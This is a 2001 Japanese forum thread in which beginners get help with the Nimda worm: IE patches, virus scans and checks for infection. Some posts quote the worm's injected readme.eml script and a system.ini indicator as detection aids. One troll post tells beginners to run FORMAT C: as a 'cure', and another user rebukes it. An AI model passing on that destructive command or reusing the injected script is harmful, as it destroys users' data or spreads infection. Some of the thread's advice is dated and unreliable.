:01/09/19 19:48 ID:plawXAu.
>590 会社に管理者いないの? W2Kserver入れてるなら対処法も解るでしょ? 再インストの要領のいいやり方だってあるよ。 どんなアプリが入ってるかわかんないからアドバイスなんて出来ない あなたが、管理者じゃなかったら管理者に聞いてみるのが一番。。。
596 :
:01/09/19 19:48 ID:UgwcW/wo
>594 フォント変えてみたら?
597 :
うまぁ :01/09/19 19:49 ID:BnRrb8v.
598 :
:01/09/19 19:50 ID:bqy1fLvU
2ちゃんの顔文字が表示できないブラウザなんてクズだ、
599 :
:01/09/19 19:50 ID:0vW2CaDA
(°д°)藁
600 :
:01/09/19 19:50 ID:wFkfN8VY
更新バージョンのところがSP2になってればよいわけれすかあ?
601 :
:01/09/19 19:50 ID:bqy1fLvU
(´ー` ) これの目が怖くなってませんか?
602 :
:01/09/19 19:50 ID:BnRrb8v.
なんかブッシュのAAがおかしいとおもったらIE6のせいか。
603 :
nanashi :01/09/19 19:50 ID:HFixfMC6
>>590 MSに「MSNのせいで感染した裁判だぁー」って言え。
まずそこからスタート
# 帰ってきたよん
>>600 そうです。ただしウイルスが入ってこられないようになっただけなので、
念のためウイルスチェックしましょう。
605 :
なってないよ。 :01/09/19 19:51 ID:5ntG1LP.
(*´ー`)
606 :
imo :01/09/19 19:51 ID:dfQQPFrw
おみとろんにて、 <script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script> をカットすれば安全
607 :
:01/09/19 19:52 ID:TUtUByPw
かちゅーしゃとかバグ、ドーナツ等タブブラウザ使えば AAが表示できると初心者向けスレでいわれたがウソなのか?
608 :
:01/09/19 19:52 ID:vHNMmWF6
たらこ唇みたいで笑える(゚Д゚)
609 :
ど素人 :01/09/19 19:52 ID:OIo7N1KQ
あの。。5.5ってよくクソブラウザとか言われてません? (理由は全然知らないんですが) 自分今、5.01SP1なんですけど、5.5より 5.01SP2にしといた方が無難でしょうか?
610 :
名無しさん :01/09/19 19:52 ID:Y0FK2RD.
ひろゆき??
611 :
:01/09/19 19:53 ID:qq6rhHg6
やはり再インストしかないのか。。。鬱だ・・・。 駆除ツールでないのかな・・・。
612 :
:01/09/19 19:53 ID:0vW2CaDA
(σ´一`)σ
>>590 いちおうマジレスしておこうかな。
まずはウイルスが入らないようにするため、クライアントとサーバはそれぞれ
ウイルスチェック。もちろん全てのファイルを対象にするのと、パターンファイル
は最新に。あとネットワークケーブルはそれぞれ外しておくように。
もしウイルスチェックを購入してないのなら今すぐ(まだ店によっては開いてる
ので)購入した方がよい。
ウイルスが駆除できたら、IEの最新バージョンをインストールする。
IE5.01SP2かIE5.5SP2かIE6.0。どれでも良い。
あとはサーバ側は
http://www.microsoft.com/japan/security/を参考に IISのセキュリティパッチを出来る限り入れること。
614 :
:01/09/19 19:54 ID:AHjGuvE2
ウィルスチェックってどうやるんですか?
615 :
:01/09/19 19:54 ID:no0J2SFs
IE6ダウンロードのついでにOutlookとメディアプレイヤー バージョンうpしたら、起動がめちゃめちゃ早くなった。 漏れだけ?
616 :
あ :01/09/19 19:54 ID:VtoXwPDk
・・・どうでもいいけど アナログだと2時間もかかる(^^; つか とりあえず2chしか見ないし エロ画像落としたりしないし 大丈夫そうだし何もしない!
617 :
:01/09/19 19:55 ID:bqy1fLvU
(;´Д`) 5,5にしただけでこれがおかしく表示されるようになったので 5、01に戻した
>>614 ウイルスチェックのソフトウエアはインストールしていないのか?
Windows標準の機能じゃないんで、インストールしていなければ不可能。
619 :
:01/09/19 19:57 ID:qq6rhHg6
>>613 ありがとうございます!
IISパッチ入れときます。
620 :
614 :01/09/19 19:57 ID:AHjGuvE2
買うんですか?MEですが、標準であったような・・・気のせいかな あとWEB上のページの同期をとっても平気なの?
621 :
:01/09/19 19:58 ID:plawXAu.
パッチ入れても観戦後だと・・・まっいいか。。。
622 :
(σ´一`)σ :01/09/19 19:58 ID:0vW2CaDA
>>616 とりあえずjavaとjavascriptとActiveXだけでもオフにしておけば良い。
見られないサイトとか出てくるかも知れないけど、安全とトレードオフ。
624 :
:01/09/19 19:59 ID:186vJgXg
>>620 パソコンによっては買ったときにインストールされてるよ
マニュアルみてくれ
625 :
609 :01/09/19 19:59 ID:OIo7N1KQ
AAがずれるから駄目って言われてるんですか?>5.5 それ嫌だから5.01SP2にしよっと。
626 :
:01/09/19 20:00 ID:qq6rhHg6
>>611 CodeBlueじゃなくてニムダだと思いますけど・・・。
>>620 Me標準だと5.5くらいだったと思うので、とりあえず最新バージョンをダウンロードしてインストール。
無償(プロバイダ料金と通話料は別)でダウンロードできる。
628 :
620 :01/09/19 20:01 ID:AHjGuvE2
629 :
626 :01/09/19 20:01 ID:qq6rhHg6
630 :
(σ´一`)σ :01/09/19 20:02 ID:0vW2CaDA
631 :
:01/09/19 20:02 ID:Ut1PoXGM
>>618 トレンドマイクロのオンラインスキャンじゃダメ?
632 :
620 :01/09/19 20:02 ID:AHjGuvE2
ME、IE5,5SP2です
>>631 OK。今日の午後以降ならちゃんとnimdaを検出できるパターンファイルになっているので。
634 :
:01/09/19 20:05 ID:m9yCiymc
>>622 うちの、社内のWEBサーバー感染したけど、Code Blueとは全然症状が違うよ。
やっぱり、ニムダの修復方法を取らないと。
でも、まだ発表されてないし、恐らく無理で再インストになりそう。
>>632 IE5.5SP2ならすでに対処済み。念のためウイルスチェックして引っかからなければ完了。
636 :
:01/09/19 20:07 ID:CSf5uW9s
JavaScriptを切るってどうやるんですか?
637 :
620 :01/09/19 20:08 ID:AHjGuvE2
ありがとうございます
638 :
:01/09/19 20:08 ID:jRZmvYDw
まだ感染後の削除方法ないのか・・・
639 :
^^。 :01/09/19 20:08 ID:YqOIBj/g
nanasisan、朝から働きどおしだ。NYの消防士みたい。 ガムバレ!(って言うしかないへたれな自分)
640 :
:01/09/19 20:08 ID:WAquPYog
5.01sp2なんだけど、どうなのよ?
>>639 俺ってこのまま明日まで眠れなかったりして(藁
そしたら今晩中にAnti-nimdaソフトウエアでも作って公開した方が早いかもー、
とか思いつつある。
642 :
:01/09/19 20:09 ID:mszmukrE
ノートンでウィルススキャンしたらNIMDA検出されました。 ノートンなら駆除できるんですか?
643 :
:01/09/19 20:09 ID:UgwcW/wo
スーパー初心者スレだからあんまり言いたくないけど、 少しは過去ログ読もうよ。答える方も大変だって。
644 :
:01/09/19 20:10 ID:NfmXYK86
>>642 とりあえず駆除させてみてください。たぶんいけるはず。
駆除したら再度スキャンして、引っかからなければOK。
>>640 問題なし。ただし昨日今日にバージョンアップしているのなら、念のためウイルスチェック。
646 :
マジで俺は時代遅れ :01/09/19 20:11 ID:ws0.K2NE
java,javascript,ActiveX,レジストリ エントリ,インストール, IISパッチ入れる・・・・ このスレで出てくる言葉はほとんどわからない。 だから、トップにあるリンク情報を開いても、 なにをいっているのかさっぱり分からない。 「どこどこのお店に行って、『〜〜をください』と言って、 それを左から何番目のキーを押して何がでてきたら、どの アルファベットを押すと何がでて・・・・」ってないい方は きっと誰もしてくれない。 勉強したいが、何を読んでいいのか分からない。 『これ一冊で、パソコン博士』ってな本はないだろうか。
647 :
:01/09/19 20:11 ID:186vJgXg
648 :
名無し :01/09/19 20:12 ID:GEWbAhZY
>>646 慣れればわかるYO
セキュリティーの本読めばすぐ分かるかもYO
650 :
:01/09/19 20:13 ID:mszmukrE
実は後穴が一番恐いYo!
652 :
:01/09/19 20:14 ID:LoP9L.6A
だあ! 派遣先め、毎週重要ファイルだけはバックアップ取れって 言ってたのに、全く取ってない奴多すぎ。 奴らは何のためにシスアドに金払ってるんだっての。 つうわけで仕事にならんし、リセットアップまでやってやる義理(契約) はないから、リセットアップ後のセキュリティ変更だけ教えて帰ってきた。 てなわけで久々のアレ逝くか……
653 :
:01/09/19 20:14 ID:4YsZA8ZQ
俺も全然分からん、だからとりあえずIE6入れといた。
654 :
:01/09/19 20:14 ID:mszmukrE
ちょっと強引だが俺のID MSずるむけロリエ
>>642 ゴメン。駆除っつーか削除だった。ファイルの中からウイルス部分だけ
消すんではなくて、ファイルごと消すしかないと思う(__)
>>646 そういうあなたにおすすめ。
http://windowsupdate.microsoft.com/ ※ javascript切ってると見られないので注意。
ここで表示される「重要な更新」のところを片っ端からチェック入れて「ダウンロード」を押してください。
ただし、ここで入れても防御壁にしかならないので、既に感染してしまった場合は意味がないので注意。
感染しているかどうかを調べるにはウイルスチェック。
656 :
:01/09/19 20:14 ID:yNH4JnFA
657 :
:01/09/19 20:14 ID:GqyGDiw2
>>646 他はともかくとして、
「インストール」がわからんってのは如何なものかと・・・
状況報告ver1.05(前編) 対策 1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする 2.それでもダイアログは開くので、覚えのないファイルはDLしない。 3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ →java関連とダウンロードのファイルのダウンロードを不許可。 現在わかっている影響 1.メールによるウイルスファイルの頒布 2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。 3.バックドアを開き、クライアントを丸裸にする。 4.大量の*.emlファイルを量産する。 5.感染したPCはCドライブをネットワーク共有する。 6.システムのスローダウン 7.リソースの消耗 8.他のファイルに潜伏する。 メールによる接触時 ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。 LANによる感染 社内に一人でも対策してないひとがいてノーパスとかにしていた場合 LANの共有フォルダを使っても自己増殖する。 感染鯖 ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> が追加される。
659 :
続き :01/09/19 20:15 ID:LoP9L.6A
状況報告ver1.05(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm 2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
といっても後者二つを消したからウイルスが消えるわけではない。
ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。
感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
660 :
CHRISTI :01/09/19 20:15 ID:qRY8meec
IE6.0を使っているんですが、Explorer exe.ってexeが付いているけど 感染しているのですか?おしえてください。
661 :
:01/09/19 20:16 ID:KkG4r6CE
5.5sp2へのアップデートのダウンロード中に 「タスクスケジューラ」のところで止まってしまう人いましたよね? 解決した人いますか?
>>652 まぁ、そういうもんだよ。重要なファイルが消えてしまったりするような
痛い目を見ないと何もしないってのは少なくとも日本国内では標準的。
アメリカのテロんときもそうだけど、対岸の火事くらいにしか見てないみたいだ。
663 :
:01/09/19 20:17 ID:plawXAu.
>660 一緒にラウンジに帰りましょ&hearts:
664 :
:01/09/19 20:17 ID:LoP9L.6A
>>660 『.exe』は実行ファイルって意味。
アプリならどんなもんにでもあると思ってくれ。
問題なし!
666 :
:01/09/19 20:19 ID:pP8e1su.
ワクチンが出きるまで2chにひきこもってよう・・
667 :
禿同 :01/09/19 20:19 ID:plawXAu.
>666 かちゅ〜しゃでね!
>>661 セーフモードで起動して、C:\Windows Setupなんとか
というディレクトリ(手元に確認できる環境がないのでゴメン)に
ie5setup.exeがあるはずなので、そこからインストールし直すと良いはず。
669 :
CHRISTI :01/09/19 20:21 ID:qRY8meec
670 :
:01/09/19 20:23 ID:acpXbJak
>>661 IEのセキュリティーを中にしたらダウンロードできましたよ。
あとウィルスソフトも中止にして。
671 :
:01/09/19 20:24 ID:ehK3v1x6
何故、ウイルスで盛り上がってるんですか?
672 :
:01/09/19 20:25 ID:KkG4r6CE
>661 過去ログにありましたね…ちょっと見てみます。 >670 中にしてあるんですけどね…
673 :
672 :01/09/19 20:26 ID:KkG4r6CE
間違えちゃった。 >661→>668でした。
674 :
:01/09/19 20:28 ID:LoP9L.6A
>>671 こいつが繁殖力と感染経路が伊達じゃない未曾有のウイルスだから。
下手するとWEBコンテンツ見ただけでOUTレベル
675 :
:01/09/19 20:30 ID:0vW2CaDA
>>659 >とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、
>ワクチンが出来るまで他のWEBコンテンツを回らない。
いや、回線を切るか、再インストールをお勧めします。
-------------------------------------------------------------------
実行されと、正当なWindows DLLとRICHED20.DLLを置き換え、system.iniを次のように
改変することによりシステムをフックします:
Shell= explorer.exe load.exe -dontrunold
ワームは自分自身を%Windows System Directory%\load.exe とWindowsテンポラリ
ディレクトリにMEP*.TMP.EXEというテンポラリファイルとしてコピーします。
ワームは、新しいメールアドレスを見つけるためにMAPIを使って受信ボックス内
のメールを読みます。このMAPIの機能は、Outlook (Outlook Express)でサポート
されています。ワームは、本文の無い、ランダムな件名のメールにワーム自身を
添付し、独自のSMTPエンジンを使ってメールを送信します。
受信したとき、readme.exe はwav(音声)ファイルになりすましています。
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected] -------------------------------------------------------------------
・MSNのOutLookメーラー使っている方は、他のメールソフトを使用することを
お勧めします。私はBeckyを使用してます。
・C:\WINDOWS\system.ini
のファイルの中に、Shell= explorer.exe load.exe -dontrunoldがあれば、感染してます。
676 :
:01/09/19 20:30 ID:0/11CXDg
IE5.5SP2にしたら動作が快適になったよ 今回の騒動で得した気分
677 :
はやお :01/09/19 20:31 ID:icJAynfc
どうよ。そう思うだろ? 内定もらって、何か変わったか? アメリカでテロがあって、お前に被害があったか? これからの人生に面白みがあるか? くだらなくて、退屈なことばっかりだろ? 生死、セックス。それだけ。あと金か。それだけだ。 臭いこと考えてる奴は一刻も早く死ね。
678 :
ナナシサソ :01/09/19 20:31 ID:Hdj3suiA
スキャン開始するも、、、。 途中で強制終了、、、 こんなんでました SCAN32 のページ違反です。 モジュール : MCSCAN32.DLL、アドレス : 0167:004d103f Registers: EAX=00000000 CS=0167 EIP=004d103f EFLGS=00010206 EBX=00000000 SS=016f ESP=0407d1b0 EBP=0407d780 ECX=000000af DS=016f ESI=00000000 FS=4767 EDX=0000001c ES=016f EDI=03dfcad6 GS=0000 Bytes at CS:EIP: 8b 08 ff 51 1c 39 c2 76 04 31 c0 eb 54 83 7c 24 Stack dump: 000000af 0407d7b6 00000000 0407dc20 004da228 00000000 03df019c 0407d798 10000763 00004000 00000061 00000100 00000000 00000000 00000000 00000000
679 :
名無し :01/09/19 20:32 ID:GEWbAhZY
680 :
失礼します :01/09/19 20:32 ID:uCR5LgWg
⇒感染したPCはCドライブをネットワーク共有する。 Cドライブがネットワーク共有しているか確かめるにはどうすれば いいんでしょうか? モノ知らずですみません。
うわあ、IE5.5+SP1だよ。 まともに喰らうじゃん。 はあ、とりあえずウィルスチェックするか。。。
682 :
CHRISTI :01/09/19 20:33 ID:qRY8meec
既出かもしれないけど、おしえてください! 友達がシマンテックのソフトで駆除したって言ってましたが、今回のもできるの?
>>678 McAfeeかな。ウイルススキャンをインストールし直す(アンインストールして、再度インストールする)と解決する可能性がある。
684 :
クチビルゲ氏ね :01/09/19 20:33 ID:.FNeXM3I
低姿勢のメッセージ出るじゃねーか テメーがマナー考えろや
685 :
ナナシサソ :01/09/19 20:34 ID:Hdj3suiA
687 :
659 :01/09/19 20:36 ID:LoP9L.6A
>>675 了解
『むしろ自他の被害の拡大を考えるならOSから入れなおした方がいい』
を追加します。
688 :
:01/09/19 20:37 ID:se/qq7uk
>>661 あんたもか? わしもなんど5.5SP2ダウンロードしてインストールしようとしてもタスクスケジュ−ラの署名がどうたらこうたらのところで止まってしまって何度もやり直しになった。 時間の無駄なので6.0にしたら問題なかった。しかもきわめて快適じゃ だだしISDNでダウンロードとインストールに1時間くらいかかったが・・ yahooの掲示板にもSP2にはタスクスケジューラに問題あるとカキコしてる人いたから何かあるのかもしらんな
689 :
名無し :01/09/19 20:37 ID:ehK3v1x6
セキュリティーに気を配らない人を 対象にしたウイルスかあ。 ウイルス製作者はヤナ奴だな。
690 :
:01/09/19 20:38 ID:LoP9L.6A
>>684 『低い姿勢』はMSのXP戦術のウリらしいです。
CMでもやってます(藁)
691 :
nanashi :01/09/19 20:38 ID:ME400ZYo
>>689 っていうか、狙ってやった感じがする。
サーカムが流行ってたときをさけて投入しようとしたけど、
テロが起きて、話題独占できないから一週間待って・・・・。ッて感じで。
考えすぎかな?
692 :
CHRISTI :01/09/19 20:40 ID:qRY8meec
693 :
:01/09/19 20:41 ID:KkG4r6CE
661>688 やはりダメみたいです… 6にしようかな…ADSLなのでそんなに時間かからないと思うんだけど… でも6は別の問題が後で発見されそうで怖い… あー面倒だ…いっそネスケにするかな…
694 :
名無し :01/09/19 20:41 ID:GEWbAhZY
掲示板のスクリプトも最新になったね。
695 :
:01/09/19 20:41 ID:gxgcJyr2
質問なんですがp2pソフトつかってファイルのやり取り する場合、感染する危険性あるんですか?相手がウイルス喰らってたりしたら。
696 :
:01/09/19 20:41 ID:XX3K0GAU
ウイルスのなおしかたおしえるよ、 DOSモードで起動して FORMAT C: と打ち込んでください。 あとはすべてYESを選んでください。 これで大丈夫です。
697 :
:01/09/19 20:42 ID:.R9N8RVQ
698 :
:01/09/19 20:42 ID:ehK3v1x6
699 :
:01/09/19 20:42 ID:HrDdE0AY
ごめん、確認させて。 SP2入れたらjava onにしても「変なファイル落としますか?」 っての気をつければいいんですよね? java offなら、それすら表示されないでより安全なんだよね?
700 :
:01/09/19 20:42 ID:LoP9L.6A
701 :
:01/09/19 20:43 ID:LRM32VyM
>696 スーパー初心者スレと銘打っているのだから、シャレにならない事は止めようね。
702 :
:01/09/19 20:43 ID:0vW2CaDA
>>680 スタート--->プログラム--->アクセサリ--->コマンドプロント
c:\>ipconfig
Ethernet adapter ローカル エリア接続:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : x.x.x.65 <---ココ
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : x.x.x.126
もしくは
C:\>netstat -an
Proto Local Address
TCP x.x.x.65:1868 <---ココ
のアドレスが自分のアドレスです。おのアドレスをIEのアドレスバーもしくは
フォルダーのアドレスを書くところに
\\192.115.10.3
という風に自分のアドレスを入れてください、共有されていたら分かります。
なお、共有されていると、フォルダに手のマークが出ているので一目かと思います。
仮にフォルダ上で右クリックして、プロパティを選択すれば、共有するかどうかの
選択項目があるかと思います。(WIN2000)
703 :
:01/09/19 20:43 ID:se/qq7uk
>>693 いまのところIE6.0極めて快適だけど・・
>>697 補足感謝。どうも疲れてるらしい・・
ついでなのでお返事。
>>682 検出は出来たけど、駆除は時と場合によるらしい(現状は少なくとも)。
あまり期待しないほうが良いかも。
705 :
:01/09/19 20:44 ID:gxgcJyr2
初心者はDOSプロンプト開かないでしょ
706 :
:01/09/19 20:45 ID:W1IFJgxM
えっとまだ質問出てナインみたいなんですが IEの5.00.2614.というバージョンは感染しないのでしょうか? WIN98SEをいれたデフォの状態なんですけど。 一応調べたら現時点では感染してないみたいなのですが・・・
>>699 javaではなくて、javascriptです。
IEだと「スクリプト」のところ以下。
708 :
■ :01/09/19 20:46 ID:yK7lM4Iw
>>696 店頭ので試したらパソコンがあぼーんしましたが何か?
709 :
Ю :01/09/19 20:46 ID:m02G5IOM
本スレと関係ないかもしれませんが ”sage.exe” って何? c:\system でヒットしたよ。 なんか怖いよ〜 助けてよ〜
710 :
:01/09/19 20:47 ID:LRM32VyM
>708 ネタだろうけどワラタ
711 :
:01/09/19 20:47 ID:xXMohiCc
712 :
:01/09/19 20:47 ID:0vW2CaDA
\\127.0.0.1 IEのアドレス、もしくは、フォルダのアドレス欄に\\127.0.0.1でもいいです。
713 :
Ю :01/09/19 20:47 ID:m02G5IOM
本スレと関係ないかもしれませんが ”sage.exe” って何? c:\system でヒットしたよ。 なんか怖いよ〜 助けてよ〜
今、5.5sp2入れたら、今までどうやっても起動しなかった Outlook Expressが使えるようになって感激した。 F士通のサポートセンターでもお手上げだったのに…。 んでもShuriken Pro買っちゃう前に直って欲しかったな。
715 :
:01/09/19 20:48 ID:LRM32VyM
>709 2ちゃん(ひろゆき)にIPが筒抜けになるウィルスです(嘘
>>713 まず真っ先に、2ちゃんねるとは無関係です。
何かの省略形でsageになるだけです。
Windowsのシステムファイルなので、ウイルスの直接的なファイルではありません。
心配ならオンラインウイルススキャンを。
717 :
699 :01/09/19 20:49 ID:HrDdE0AY
>>707 あ、はい。わかりました。
5.01SP2にしたから、もうそこを有効にしてもOKですよね。
ありがとうございました。
718 :
CHRISTI :01/09/19 20:49 ID:qRY8meec
>>704 ありがとう。友達に伝えときます。
>>697 こっちは初心者でパニクッているの!そんなことまで頭まわんないよー。
719 :
:01/09/19 20:49 ID:WWsfs2Hg
>>706 がいしゅつです。
あなたのは「IE5.01SP2」以下、つまり放置してれば感染します。
今すぐアップデートしてください。
720 :
エロ医務エッサイム :01/09/19 20:50 ID:HQM1BL.k
>>709 お、俺もヒットした・・・場所は、c:\windows\system だった。
Task Scheduler Sage Compatibility っていう正式名称で、
バージョンは 4.71.1972.1 だった。
IEのアップデートしたときのファイルかもしれない。
721 :
:01/09/19 20:50 ID:0vW2CaDA
>>713 マウスの右クリック--->プロパティ--->バージョン情報
みてみろよ。
722 :
:01/09/19 20:51 ID:LRM32VyM
>717 うpした後でも知らないファイルを「ダウンロードしますか?」と聞かれたら キャンセルしなければ意味はないからね
723 :
訂正 :01/09/19 20:51 ID:HQM1BL.k
724 :
706 :01/09/19 20:51 ID:NrUFwNFo
ありがとうございます。 今から急いでアップデートします。
725 :
:01/09/19 20:51 ID:4YsZA8ZQ
今日初めてパソコン買ったぜベイベー
726 :
:01/09/19 20:51 ID:xl/0vm/6
IE6をダウンロードして使ってます。 でも、「IE6はバグだらけだからやめとけ」という書き込みを 見たのですが本当ですか? 私は今のところ問題はないのですが、、、
727 :
:01/09/19 20:51 ID:F2AdiCCw
>>702 それなら
\\127.0.0.1\
としたほうがラク。
ところで、うちで試してみた感じだと、
どうやっても症状でないんだけど、そういう構成もあるのだろうか。
Windows2000 Professionalで、readme.exe実行しても、
*.emlの増殖もないし、ファイルの置き換えも起こらない。
メールも投げてないみたい。
あと思ったんだけど、ウイルスとワームは違うような気がするんだけど、
誰も気にならない?
ワームだったら該当ファイルとレジストリのホック消して再起動でいいけど、
ウイルスだったら怖い。
728 :
名無しさん :01/09/19 20:52 ID:Sae9YU9w
ホットメールの受信トレイ見に行っても感染する?
729 :
:01/09/19 20:53 ID:NKzK6Wto
IE6にはできたんだけど、さらにjavaの設定いじらないとあかんの?
730 :
699 :01/09/19 20:53 ID:HrDdE0AY
>>728 今現在は問題ない。少なくとも自分のアカウントでは。
732 :
:01/09/19 20:54 ID:wekcpjX.
オンラインウイルススキャンがMC AFEEウィルススキャンが 残っているため起動できません。 アンインストールもできないの(泣)
733 :
:01/09/19 20:55 ID:Fdu8QPT2
>>729 IE6で感染したって人が過去スレにいますね
>>729 とりあえずの対応は完了しているので、あとは予期していないのに出てくる
「ダウンロードしますか?」をキャンセルすることだけ忘れずに。
あと感染していないかどうかのチェックも。
735 :
名無しさん :01/09/19 20:55 ID:Sae9YU9w
>>731 ありがとうございます。今から見に行ってまいります。
736 :
加藤 :01/09/19 20:55 ID:aLIwLUDE
あん、わたしのにもあったわ。sage.exe なによこれ?
737 :
713=709 :01/09/19 20:56 ID:m02G5IOM
先ずは多重カキコお詫びもうしあげます
>>713 >>721 さん有難うございます
しかしこの板で質問の答えを見る時、メール蘭みたり
斜めに読んでみたり忙しかったです。
sage.exeはSystemAgentかな。 タスクスケジューラを呼び出すやつ?
740 :
おいおい :01/09/19 21:00 ID:XpJYzqVw
741 :
:01/09/19 21:01 ID:KkG4r6CE
>726 6をダウンロードしようか迷っている>693です 色々見ていたらフレッツADSLで不具合が出ているとか… 私はフレッツなので思いっ切り躊躇しています。 ああどうしよう。
742 :
:01/09/19 21:01 ID:wyLXlK3k
MSのサイトからIE5.01SP2をダウソしたんだけど、 バージョン情報で確認すると5.00.3314、更新;;SP2;になってる。 コレデイイノ?ガイシュツだったらスマソ
743 :
:01/09/19 21:03 ID:yK7lM4Iw
744 :
教えてください :01/09/19 21:04 ID:Zp7vMJB6
スレ違いどころか、板違いかもしれませんが・・・ ZAの警告の所にIPみたいの出るじゃないですかぁ。 これで、何が分かるんですか?
745 :
:01/09/19 21:05 ID:KDHN2rRM
>>741 止めた方が良いと思う
漏れはISDNだが、2ちゃんねるの特定の板が見れなくなったり
バグが多かった
結局5.01SP2にした
746 :
:01/09/19 21:06 ID:qq6rhHg6
>>745 2ちゃんねるの特定の板が見れないのは2ちゃんねる側のバグだとおもわれ。
747 :
ななし :01/09/19 21:07 ID:MjPd0JhE
5.5SP2でADSLだけど問題なし。 ところでトレンドマイクロのオンラインチェックに入れない…一杯なの?
748 :
:01/09/19 21:07 ID:plawXAu.
tracert IP 解ってどうする?who is?
749 :
:01/09/19 21:08 ID:j3wQIAgQ
750 :
:01/09/19 21:13 ID:EynE1.9c
751 :
名無しさん2000 :01/09/19 21:13 ID:celyGT2I
ドライブの共有の話が出て来たけど、 俺はwin2000使ってるんだけどパソコン起動させるたびに ドライブが共有する設定になってるんだけど、なぜですか? 共有しないの方にボタンを移動させても再起動すると戻っています。
752 :
744 :01/09/19 21:15 ID:Zp7vMJB6
>>748 どんな攻撃を受けようとしてたのかってのを
知りたい時は、どうしたら良いんですか?
>>751 それはOS上の機能で強制的に共有する("C$", "D$", etc.)ようになっているからです。
特に問題はありません。
754 :
__ :01/09/19 21:18 ID:3jkFkg92
スレ違いの教えてくんウザイ
>>752 どんな攻撃なのかはパケットをキャプチャするソフトウエア
(unix系ならtcpdump, Windows系ならSniffer(売り物)とか)
を使って解析するという方法しかないのでは。
ZoneAlarmである程度までなら解るとは思いますが。
756 :
:01/09/19 21:18 ID:plawXAu.
>744 このスレとは関係ないから セキュ板で聞いてください。 たぶん痕跡がなければ答えは出ないけどね。
757 :
:01/09/19 21:18 ID:um1VlERs
ウチの部署はカンケーねーや…なんて思ってたら アホ課長のPCがやられてたよ。。。ネット感染じゃなくて多分 共有フォルダからの感染だよ ムカツク! 今見たらプリンターまで使えなくなってるよ〜〜 PCの環境によって症状に違いが出るのかね?? このまま帰ったら明日の朝、課長が大騒ぎだろうな… まるで天地がひっくり返ったかのように大騒ぎだろうな… でも今日、これから再インストールは嫌だなぁ。。。 なんかいい方法ないっすかね?>ALL 多分、漏れと同じ境遇のお人は多いと思われ
758 :
a :01/09/19 21:19 ID:gFa/ijCk
759 :
:01/09/19 21:20 ID:LoP9L.6A
760 :
:01/09/19 21:20 ID:qq6rhHg6
>>757 激しく同意。
早く帰りたい。腹減ったー。
761 :
名無しさん98sp2 :01/09/19 21:21 ID:H46UXkRs
5.50をSP2に揚げたらぽこぽこ落ちるぞ。 その度に「報告しますか?」つてなんか通信しておもしろいから 放ってるけど。
762 :
:01/09/19 21:21 ID:qq6rhHg6
763 :
ななしななし :01/09/19 21:21 ID:BlkLvorM
先日IE5.5SP2をダウンロードしたんだけど、「IEに問題が発生しました」とか いうダイアログが出てブラウザ全くたちあがんなかった。 強制終了も出来ず、コンセント切って結局5.01SP2にに戻した。 この状態で6.0DLしてもまた上手く行かない気がする・・・。 しかもウチフレッツだし(鬱
764 :
ななし :01/09/19 21:23 ID:4Uzbg7FI
>>761 それWinが死にかけてる
Windows2000を入れ直せ
765 :
よいしょ。 :01/09/19 21:23 ID:0kJpk41I
1.IE5(;´Д`) 2.とりあえずMcAfeeだけどウイルススキャンしてみた→検出されず 3.ファイル検索で過去レスの3つの文字列を検索→検出されず 4.ただいまIE5.01SP2をあぷでーと中。 これで防げますか?ダウソ終わったらjavaとか切ろうと思うのですが。 日本語変だな・・・。どなたかお答えお願いします・・・。
766 :
七資産 :01/09/19 21:24 ID:hW565bek
>>757 とりあえず全てのPCからネットワークケーブルを外す。
かつ、接続しているハブの電源を落として、電源アダプタごと回収。
スイッチングハブのような高級ハブならポート単位でON/OFFできると思うので、
もしそのような環境なら全てのポート(自分が使っているモノは除いて)OFF。
すると明日は「つながらねーぞ」と片っ端から連絡があるはずなので、連絡が
あった順に手順を教えて、対応が完了したところからネットワークに繋げられる
ようにすると良い。
768 :
:01/09/19 21:25 ID:gzV2RVU2
フレッツISDNでIE5.5SP2だけど問題なくサクサク動いてるよ
769 :
680です :01/09/19 21:25 ID:KlwuXEE2
>>686 遅れてすみません。
ありがとうございました!
さっそくやってみます、勉強不足でした。
770 :
:01/09/19 21:25 ID:S6NNxtPg
今回のは、イソテルのマッチポンプでしょ
771 :
_ :01/09/19 21:26 ID:Zp7vMJB6
>>747 JAVAとかアクティブXとか
切ってるんじゃないの?
切ってたらオンラインチェックできなくない?
>>765 McAfeeのパターンファイルは最新のモノ?
最新であれば問題ない。あとは社内とかのPCであれば共有フォルダ越しに
感染させられないよう注意。
774 :
通り掛かりの人 :01/09/19 21:27 ID:svQwaFoY
皆良い人ばかりだ・・・ 日本もまだまだ捨てたもんじゃないな・・・
775 :
:01/09/19 21:28 ID:57WZnc7g
JavaもJavaScriptも切ってるから漏れはだいじょび
776 :
:01/09/19 21:28 ID:ZLmWIMKs
NHK見れ!!
777 :
:01/09/19 21:28 ID:plawXAu.
NHKあげ
778 :
:01/09/19 21:28 ID:Ut1PoXGM
779 :
よいしょ。 :01/09/19 21:29 ID:0kJpk41I
>>772 最新にしてからスキャンしましたです。
